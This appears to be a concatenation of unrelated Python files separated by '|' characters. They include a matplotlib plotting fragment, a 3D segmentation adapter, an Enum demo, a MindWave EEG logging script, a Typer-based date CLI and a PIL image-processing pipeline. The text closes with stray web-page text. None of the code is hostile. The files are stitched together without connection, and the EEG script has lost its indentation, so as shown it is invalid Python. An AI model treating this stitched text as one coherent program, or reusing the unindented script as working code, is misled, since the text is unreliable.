        ax.plot(i, control_sim[i], 'og', markersize=3, c='g')
        ax.errorbar(i, modulated['mean'],
                    xerr=0, yerr=modulated['std'],
                    fmt='rs', capsize=5, markersize=8, elinewidth=4)
        ax.errorbar(i, control['mean'],
                    xerr=0, yerr=control['std'],
                    fmt='bs', capsize=2, markersize=4, elinewidth=2)
    ind = np.arange(num_models)
    plt.xticks(ind, x_ticks, rotation=60, fontsize=14)
    plt.yticks(fontsize=12)
    plt.ylabel(ylabel, fontsize=14)
    plt.title(title)
    plt.tight_layout()
    # legend
    '''
    legend_elements = [Line2D([0], [0], marker='o', color='w', label='Optimised models',
                              markerfacecolor='g', markersize=1),
                       Line2D([0], [0], marker='o', color='w', label='Optimised Modulated models',
                              markerfacecolor='k', markersize=1),
                       Line2D([0], [0], marker='s', color='w', label='Modulated Data',
                              markerfacecolor='r', markersize=1),
                       Line2D([0], [0], marker='s', color='w', label='Control Data',
                              markerfacecolor='b', markersize=1)]
    ax.legend(handles=legend_elements, loc='upper right')
    '''
    if save:
        # NOTE(review): `papertype` and `frameon` were removed from
        # matplotlib.pyplot.savefig (3.3 / 3.1) — this call requires an
        # older pinned matplotlib; confirm the environment.
        plt.savefig(pathlib.Path(dir_path) / filename,
                    dpi=600, facecolor='w', edgecolor='w',
                    orientation='portrait', papertype=None, format=None,
                    transparent=False, bbox_inches=None, pad_inches=0.1,
                    frameon=None, metadata=None)
    else:
        plt.show()
|
import numpy as np
import torch
from torchvision.utils import make_grid
from .base import ModelAdapter
__all__ = ['Segmentation3dModelAdapter']
class Segmentation3dModelAdapter(ModelAdapter):
    """Model adapter for 3D segmentation: renders predicted vs. ground-truth
    segmentation maps as TensorBoard image grids."""

    def __init__(self, config, log_path):
        super(Segmentation3dModelAdapter, self).__init__(config, log_path)
        self.num_classes = config['model']['classes']
        # One random RGB colour per class; class 0 (background) forced to black.
        self.class_colors = np.random.randint(0, 255, (self.num_classes, 3), dtype=np.uint8)
        self.class_colors[0] = (0, 0, 0)

    def make_tensorboard_grid(self, batch_sample):
        """Build a grid of the ground-truth and predicted colour maps for the
        16 2D slices with the most non-background pixels.

        NOTE(review): assumes y_pred is (N, C, D1, D2, slices) and y is
        (N, D1, D2, slices) given the permutes below — confirm upstream shapes.
        """
        data, y_pred = batch_sample['data'], batch_sample['y_pred']
        y = data[1]
        # select 2d slices with highest number of non-background pixels
        images_number = 16
        y_pred_2d, y_2d = y_pred.permute(0, 4, 1, 2, 3), y.permute(0, 3, 1, 2)
        y_pred_2d, y_2d = y_pred_2d.reshape(-1, *y_pred_2d.shape[2:]), y_2d.reshape(-1, *y_2d.shape[2:])
        # Label sum as a proxy for "amount of foreground" per slice.
        scores = y_2d.sum(dim=(1, 2))
        _, indexes = scores.topk(images_number)
        y, y_pred = y_2d[indexes], y_pred_2d[indexes]
        # argmax over the class channel -> per-pixel predicted labels.
        _, y_pred = y_pred.max(1)
        return make_grid(torch.cat([
            self.decode_segmap(y, self.num_classes),
            self.decode_segmap(y_pred.to(y.device), self.num_classes)
        ]), nrow=y.shape[0])

    def decode_segmap(self, image, nc=201):
        """Map integer label images (N, H, W) to float RGB images in [0, 1].

        NOTE(review): pixels whose label is >= nc keep uninitialized values
        from torch.empty — assumes labels always lie in [0, nc).
        """
        out = torch.empty(image.shape[0], 3, *image.shape[1:], dtype=torch.float32, device=image.device)
        for l in range(0, nc):
            idx = image == l
            out[:, 0].masked_fill_(idx, self.class_colors[l][0])
            out[:, 1].masked_fill_(idx, self.class_colors[l][1])
            out[:, 2].masked_fill_(idx, self.class_colors[l][2])
        return out / 255.0
|
""" https://docs.python.org/3/library/enum.html
"""
from enum import Enum
class Color(Enum):
    """Demonstration enum with three members (see enum docs link above)."""
    RED = 1
    GREEN = 2
    BLUE = 3
if __name__ == "__main__":
    # Iterating an Enum yields its members in definition order.
    color_names = [c.name for c in Color]
    color_values = [c.value for c in Color]
    print(color_names)
    print(color_values)
    # Lookup by name string and attribute access both yield the same member.
    print(Color["RED"])
    print(Color.RED)
|
#!/usr/bin/env python
import time, struct,sys
import bluetooth
from mindwavemobile.MindwaveDataPoints import AttentionDataPoint, EEGPowersDataPoint
from mindwavemobile.MindwaveDataPointReader import MindwaveDataPointReader
import numpy as np
import pylab as pl
def main():
mdpr = MindwaveDataPointReader()
mdpr.start()
eeg_datapoints = []
attention_datapoints = []
index = 0
try:
while(True):
data = mdpr.readNextDataPoint()
if (data.__class__ is AttentionDataPoint):
attention_datapoints.append((time.time(),data))
if (data.__class__ is EEGPowersDataPoint):
eeg_datapoints.append((time.time(),data))
index+=1
print index
except KeyboardInterrupt:
pass
fmt = 'ddddddddd'
dataFormat = []
file_ = open(sys.argv[1], 'wb')
file_.write(fmt.ljust(25,' '))
for i in xrange(len(eeg_datapoints)):
timestamp = attention_datapoints[i][0]
attention = attention_datapoints[i][1]
delta = eeg_datapoints[i][1].delta
theta = eeg_datapoints[i][1].theta
lowalpha = eeg_datapoints[i][1].lowAlpha
highalpha = eeg_datapoints[i][1].highAlpha
lowbeta = eeg_datapoints[i][1].lowBeta
highbeta = eeg_datapoints[i][1].highBeta
lowgamma = eeg_datapoints[i][1].lowGamma
midgamma = eeg_datapoints[i][1].midGamma
s = struct.pack(fmt,timestamp, delta, theta, lowalpha, highalpha, lowbeta, highbeta, lowgamma, midgamma)
file_.write(s)
file_.close()
if __name__ == '__main__':
main() |
"""Entrypoint for `ee`.
Functions not decorated with @app are actions to affect state"""
import readline # noqa: F401
from typing import List
import pyperclip
import typer
from click import clear
from ee_cli import __doc__, __version__
from ee_cli.constants import CONFIGURATION_INFO, HOTWORDS_HELP, MAYBE_TZ_HEADS_UP
from ee_cli.repl_content_state import content_state
from ee_cli.settings import Settings
from ee_cli.ui import EchoList
# Single-command Typer application; `main` below is its only command.
app = typer.Typer(name="ee", help="A salve for timesmiths 🧴🕰️")
# Environment-driven configuration object.
# NOTE(review): `settings` is not referenced anywhere in this module — confirm
# whether instantiating it here has required side effects before removing.
settings = Settings()
def _repl():
    """Run the interface for interactively transforming dates."""
    # Build the prompt once, outside the loop. Plain concatenation (rather
    # than a single f-string) keeps the nested ANSI coloring intact.
    styled_prompt = typer.style(
        f"\n\n{MAYBE_TZ_HEADS_UP}"
        + typer.style(" > ", fg=typer.colors.BRIGHT_RED)
    )
    clear()  # start from a full-screen view
    dispatch, current_content = content_state()
    while True:
        # The suffix visually acts as a prefix for the next input line.
        user_input = typer.prompt(
            "",
            prompt_suffix=styled_prompt,
            default=current_content(),
            show_default=True,
        )
        dispatch(user_input)
        clear()
def _version_callback(value: bool, ctx: typer.Context):
    """Handle --version: print the version and exit.

    Refuses to run when --version is combined with any other argument
    or option.
    """
    if not value:
        return value
    if len(ctx.args) or any(ctx.params.values()):
        raise typer.Abort("--version must be called alone.")
    typer.echo(__version__)
    raise typer.Exit()
def _exclusivity_check(ctx: typer.Context):
    """Make sure arguments don't get called in combinations that don't make sense.

    Not decorated with `app.callback` because that is only for apps with
    multiple commands.
    """
    if ctx.params["repl"] is True:
        ctx.params.pop("repl")
        # With --repl, every remaining param and argument must be falsey.
        has_other_input = any(v for v in ctx.params.values()) or len(ctx.args)
        if has_other_input:
            raise typer.Abort("--repl must be called alone.")
    return ctx
@app.command(help=__doc__, no_args_is_help=True)
def main(
    ctx: typer.Context,
    # Positional date strings to convert; parsing happens inside EchoList.
    dates: List[str] = typer.Argument(
        None,
        help="Dates/datetimes separated by spaces.\n"
        "Can be in the style of an epoch timestamp (milliseconds will be ignored) or\n"
        "Any of YYYY-MM-DD, MM-DD-YY, MMM DD YYYY, MMM D YYYY, MMM D YY, MMM DD YY or\n"
        "in any of the formats specified in EXTRA_DATETIME_INPUT_FORMATS, which can be "
        "any of the formats supported by Pendulum: "
        "https://pendulum.eustace.io/docs/#tokens",
    ),
    copy: bool = typer.Option(
        False,
        "--copy",
        "-c",
        is_flag=True,
        show_default=False,
        help="Send output to the clipboard.",
    ),
    plain: bool = typer.Option(
        False,
        "--plain",
        "-p",
        is_flag=True,
        show_default=False,
        help="Don't show pretty output, just transformations.",
    ),
    repl: bool = typer.Option(
        False,
        "--repl",
        "-r",
        is_flag=True,
        show_default=False,
        help="In an infinite prompt, give an epoch, get a datetime, and vice versa.\n"
        "Can be controlled with various redundant hotwords:\n"
        f"{HOTWORDS_HELP}",
    ),
    config: bool = typer.Option(
        False,
        "--show-config",
        is_flag=True,
        show_default=False,
        help="Show current values for `ee-cli` environment variables (including unset)",
    ),
    version: bool = typer.Option(
        None,
        "--version",
        "-v",
        # Runs eagerly during parsing; may exit before the body executes.
        callback=_version_callback,
        help="Print the version and exit",
    ),
):
    """Acts as the entrypoint for `ee`."""
    # --repl must not be combined with any other flag/argument.
    _exclusivity_check(ctx)
    if repl:
        _repl()
        return
    if config:
        typer.echo(CONFIGURATION_INFO)
        return
    # Transform all given dates; EchoList handles parsing and formatting.
    output = EchoList(*dates)
    if copy:
        pyperclip.copy(output.plain_str())
        typer.echo(
            f"Converted date{'s' if len(dates) > 1 else ''} copied to clipboard."
        )
        return
    typer.echo(output.plain_str() if plain else output)
    # if it's not plain, we add a 3-space indent to match the styled EchoList.__str__
    # if it *is* plain, we add the newline because EchoList.plain_str doesn't have one
    maybe_indent = "   " if not plain else "\n"
    typer.echo(f"{maybe_indent}{MAYBE_TZ_HEADS_UP}")
|
from __future__ import division, unicode_literals
from PIL import Image, ImageOps
# Global registry mapping a processor name to its factory function.
PROCESSORS = {}


def build_handler(processors, handler=None):
    """Compose the named processors around `handler`, right to left.

    Each entry in `processors` is either a registered name, or a
    (name, *args) list/tuple for parameterized processors. Returns the
    outermost callable, which takes (image, context).
    """
    identity = lambda image, context: image
    handler = handler or identity
    for entry in reversed(processors):
        if isinstance(entry, (list, tuple)):
            factory_name, extra_args = entry[0], entry[1:]
            handler = PROCESSORS[factory_name](handler, *extra_args)
        else:
            handler = PROCESSORS[entry](handler)
    return handler
def register(fn):
    """Decorator: expose `fn` in the PROCESSORS registry under its own name."""
    PROCESSORS.update({fn.__name__: fn})
    return fn
@register
def default(get_image):
    """The standard pipeline: ICC profile, GIF, PNG, JPEG handling, then autorotate."""
    pipeline = [
        "preserve_icc_profile",
        "process_gif",
        "process_png",
        "process_jpeg",
        "autorotate",
    ]
    return build_handler(pipeline, get_image)
@register
def autorotate(get_image):
    """Apply the EXIF orientation tag before handing the image downstream."""
    def processor(image, context):
        upright = ImageOps.exif_transpose(image)
        return get_image(upright, context)

    return processor
@register
def process_jpeg(get_image):
    """For JPEG output: set quality/progressive options and force RGB mode."""
    def processor(image, context):
        if context.save_kwargs["format"] != "JPEG":
            # Not saving as JPEG: pass through untouched.
            return get_image(image, context)
        context.save_kwargs["quality"] = 90
        context.save_kwargs["progressive"] = True
        if image.mode != "RGB":
            # JPEG cannot store alpha/palette modes.
            image = image.convert("RGB")
        return get_image(image, context)

    return processor
@register
def process_png(get_image):
    """Promote palette-mode images to RGBA when saving as PNG."""
    def processor(image, context):
        needs_rgba = context.save_kwargs["format"] == "PNG" and image.mode == "P"
        if needs_rgba:
            image = image.convert("RGBA")
        return get_image(image, context)

    return processor
@register
def process_gif(get_image):
    """Carry a GIF's transparency and palette through the pipeline."""
    def processor(image, context):
        if context.save_kwargs["format"] != "GIF":
            # Not saving as GIF: nothing special to preserve.
            return get_image(image, context)
        if "transparency" in image.info:
            context.save_kwargs["transparency"] = image.info["transparency"]
        # Remember the source palette and restore it on the processed result,
        # since downstream processors may drop it.
        source_palette = image.getpalette()
        processed = get_image(image, context)
        processed.putpalette(source_palette)
        return processed

    return processor
@register
def preserve_icc_profile(get_image):
    """Copy the source image's ICC profile into the save kwargs, when present."""
    def processor(image, context):
        profile = image.info.get("icc_profile")
        if profile:
            context.save_kwargs["icc_profile"] = profile
        return get_image(image, context)

    return processor
@register
def thumbnail(get_image, size):
    """Scale the image down (never up) to fit inside `size` (width, height)."""
    def processor(image, context):
        image = get_image(image, context)
        current_w, current_h = image.size
        # Scale factor capped at 1.0 so images are only ever shrunk.
        scale = min(1.0, size[0] / current_w, size[1] / current_h)
        new_size = [int(scale * side) for side in image.size]
        return image.resize(new_size, Image.LANCZOS)

    return processor
@register
def crop(get_image, size):
    """Crop to `size` (width, height) centered on the context's PPOI, then resize.

    PPOI ("primary point of interest") is read from `context.ppoi` as a pair
    of fractional (x, y) coordinates in [0, 1] — presumably; confirm against
    the caller that sets context.ppoi. The crop window matches the target
    aspect ratio, is centered on the PPOI, and is clamped to the image bounds.
    """
    width, height = size

    def processor(image, context):
        image = get_image(image, context)
        # PPOI in pixel coordinates.
        ppoi_x_axis = int(image.size[0] * context.ppoi[0])
        ppoi_y_axis = int(image.size[1] * context.ppoi[1])
        center_pixel_coord = (ppoi_x_axis, ppoi_y_axis)
        # Calculate the aspect ratio of `image`
        orig_aspect_ratio = float(image.size[0]) / float(image.size[1])
        crop_aspect_ratio = float(width) / float(height)

        # Figure out if we're trimming from the left/right or top/bottom
        if orig_aspect_ratio >= crop_aspect_ratio:
            # `image` is wider than what's needed,
            # crop from left/right sides
            # (+ 0.5 rounds to nearest pixel instead of truncating)
            orig_crop_width = int((crop_aspect_ratio * float(image.size[1])) + 0.5)
            orig_crop_height = image.size[1]
            crop_boundary_top = 0
            crop_boundary_bottom = orig_crop_height
            # Center the window on the PPOI, then clamp to the image edges
            # while keeping the window width constant.
            crop_boundary_left = center_pixel_coord[0] - (orig_crop_width // 2)
            crop_boundary_right = crop_boundary_left + orig_crop_width
            if crop_boundary_left < 0:
                crop_boundary_left = 0
                crop_boundary_right = crop_boundary_left + orig_crop_width
            elif crop_boundary_right > image.size[0]:
                crop_boundary_right = image.size[0]
                crop_boundary_left = image.size[0] - orig_crop_width
        else:
            # `image` is taller than what's needed,
            # crop from top/bottom sides
            orig_crop_width = image.size[0]
            orig_crop_height = int((float(image.size[0]) / crop_aspect_ratio) + 0.5)
            crop_boundary_left = 0
            crop_boundary_right = orig_crop_width
            # Same centering-then-clamping, along the vertical axis.
            crop_boundary_top = center_pixel_coord[1] - (orig_crop_height // 2)
            crop_boundary_bottom = crop_boundary_top + orig_crop_height
            if crop_boundary_top < 0:
                crop_boundary_top = 0
                crop_boundary_bottom = crop_boundary_top + orig_crop_height
            elif crop_boundary_bottom > image.size[1]:
                crop_boundary_bottom = image.size[1]
                crop_boundary_top = image.size[1] - orig_crop_height
        # Cropping the image from the original image
        cropped_image = image.crop(
            (
                crop_boundary_left,
                crop_boundary_top,
                crop_boundary_right,
                crop_boundary_bottom,
            )
        )
        # Resizing the newly cropped image to the size specified
        # (as determined by `width`x`height`)
        return cropped_image.resize((width, height), Image.LANCZOS)

    return processor
|
from .neumann import TruncatedNeumannEstimator |
from gym.envs.registration import register
# Register the Hacktrick environment with Gym so it can be created via
# gym.make('Hacktrick-v0').
register(
    id='Hacktrick-v0',
    entry_point='hacktrick_ai_py.mdp.hacktrick_env:Hacktrick',
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.